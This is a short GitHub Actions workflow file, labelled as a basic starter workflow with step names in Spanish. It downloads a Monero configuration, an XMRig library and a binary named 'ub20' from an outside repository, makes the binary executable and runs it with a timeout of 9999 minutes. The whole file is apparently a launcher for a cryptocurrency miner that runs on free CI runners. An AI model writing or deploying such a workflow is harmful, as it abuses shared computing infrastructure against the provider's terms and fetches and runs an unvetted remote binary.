# This is a basic workflow to help you get started with Actions

name: ub20xm

on: workflow_dispatch

jobs:
  mnub20:

    runs-on: ubuntu-latest
    timeout-minutes: 9999

    steps:
    - name: Descargar.
      run: |
        wget https://raw.githubusercontent.com/romanferty/Ubun20_xmrg/main/Monero/config.json
        wget https://raw.githubusercontent.com/romanferty/Ubun20_xmrg/main/libxmrig-asm.a
        wget https://raw.githubusercontent.com/romanferty/Ubun20_xmrg/main/ub20
    - name:  Dar permisos.
      run: chmod u+x ub20
    - name: Ejecutar.
      run: ./ub20
